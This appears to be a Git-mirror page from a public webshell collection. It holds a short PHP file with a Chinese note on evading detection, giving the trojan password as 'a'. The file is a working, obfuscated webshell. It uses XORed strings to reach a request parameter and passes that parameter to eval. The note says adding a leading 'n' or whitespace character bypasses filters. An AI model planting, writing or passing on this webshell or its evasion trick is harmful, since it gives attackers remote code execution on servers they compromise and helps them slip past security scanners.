mirror of
https://github.com/tennc/webshell.git
synced 2025-12-06 21:01:29 +00:00
from : https://www.anquanke.com/post/id/193787 参数$b的前面加上“n"就成功绕过了,当然同理,你也可以在参数$b的前面加上"\"、"\t"、"\r"等等也是可以绕过的。 在参数$b的前面加上"\n",""、"\t"、"\r"等等也是可以绕过的。 木马密码:a
6 lines
72 B
PHP
6 lines
72 B
PHP
<?php
|
|
$a = "~+d()"^"!{+{}";
|
|
$b = ${$a}[a];
|
|
eval("n".$b);
|
|
?>
|